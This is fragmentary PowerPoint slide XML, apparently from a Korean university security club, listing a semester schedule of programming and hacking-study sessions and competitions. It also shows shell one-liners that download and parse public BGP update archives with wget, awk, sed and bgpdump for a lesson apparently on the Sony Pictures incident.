                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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t>정보보호 동아리 소개</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a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3.18 1600 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" err="1">
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>백도우</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3.16 1900 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>이원철</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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t>프로그래밍 문제풀이 기초</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>BaekJoon</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solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>이원철</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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t>시스템 보안 기초</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HackerSchool</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> FTZ</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>백도우</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t>국제 프로그래밍 대회</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
                        <a:t>(ICPC)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
                        <a:t> 실전 준비</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solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>* </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월 예선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ICPC </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>참가 가능한 인원</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ICPC </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>참가</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>예선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>본선 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>11</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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t>프로그래밍 문제풀이 심화</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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err="1"/>
                        <a:t>코드게이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
                        <a:t> 참가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
                        <a:t>? </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>미정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="105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a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, 2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>일간</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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t>정보보안</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a:t>( </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" err="1"/>
                        <a:t>시스템해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" err="1"/>
                        <a:t>웹해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050" err="1"/>
                        <a:t>리버싱</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="105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t>실전 문제 풀이</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t>안보지원사 해킹대회 참가</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>아직 일정 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>통상 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="105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a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>주차 까지는 자유롭게 두 분반 모두 듣고 결정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>주차 부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>분반 중 하나 결정하여 활동 참여</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>반장 송재경 주관 인원 분배</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>소니피쳐스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 사고 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>데이터 다운</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 name="그룹 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67872C09-AF56-4960-8E58-6DC8574F7B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="980812" y="1828697"/>
            <a:ext cx="9975210" cy="3772003"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="4134678"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="사각형: 둥근 모서리 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0B2E63E-9510-4E90-B878-DE9DE6EBAFA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24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB677F0E-E8A3-42A7-92FB-D19B7F7D169F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="3706842"/>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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>homework</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cd homework</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da-DK" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>wget </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="da-DK" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>http://archive.routeviews.org/bgpdata/2014.12/UPDATES/</a:t>
              </a:r>
              <a:endParaRPr lang="da-DK"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cat index.html</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cat index.html | grep updates</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cat index.html | grep updates | awk -F "\"" '{print $8}'</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cat index.html | grep updates | awk -F "\"" '{print $8}' | grep 2014122[234]</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cat index.html | grep updates | awk -F "\"" '{print $8}' | grep 2014122[234] &gt; download_list.txt</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> in $(cat download_list.txt) ; do echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> ; done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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> in $(cat download_list.txt) ; do echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> | sed 's/\./ /g' ; done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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> in $(cat download_list.txt) ; do echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> |  awk -F "." '{print $2}'; done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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> in $(cat download_list.txt | head) ; do echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> ; done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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>wget</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>http://archive.routeviews.org/bgpdata/2014.12/UPDATES/updates.20141222.0000.bz2</a:t>
              </a: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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> in $(cat download_list.txt | head) ; do </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>wget</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> "http://archive.routeviews.org/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>bgpdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/2014.12/UPDATES/$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>fn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>" ; done</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153793301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/Theory/T17 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>소니피쳐스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 사고 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>데이터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0ED1C9CF-0C1C-4AB1-9CFD-6DB4EF3C11AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="334735" y="2197197"/>
            <a:ext cx="11511643" cy="3689785"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="4134678"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="사각형: 둥근 모서리 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB88B43-B135-4B1A-9BC9-3BF397BDAE5D}"/>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3" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B43793F-19EA-4DEA-9A72-89A69D31D33E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1196835" y="1885839"/>
              <a:ext cx="3919993" cy="3523878"/>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f in *; do echo $f ; done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f in *.bz2; do echo $f ; done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f in *.bz2; do echo $f | sed 's/\.//g' ; done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f in *.bz2; do </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>ts</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>=`echo $f | sed 's/\.//g'` ; echo ${ts:7:12} ; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost ~]# for f in *.bz2; do ts=`echo $f | sed 's/\.//g'` ; echo ${ts:13:6} ; done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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>bgpdump</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m updates.20141222.0000.bz2 | head</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>bgpdump</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m updates.20141222.0000.bz2 | awk -F "|" '{print $3}' | head</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>bgpdump</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> -m updates.20141222.0000.bz2 | awk -F "|" '{print $3}' | sort | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>uniq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> -c</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost ~]# bgpdump -m updates.20141222.0000.bz2 | awk -F "|" '{print $3}' | sort | uniq -c | sed 'N; s/\n/ /' </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost ~]# bgpdump -m updates.20141222.0000.bz2 | awk -F "|" '{print $3}' | sort | uniq -c | sed 'N; s/\n/,/g; s/A//g; s/W//g; s/ //g' </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f in *.bz2; do </a:t>
              </a:r>
              <a:r>
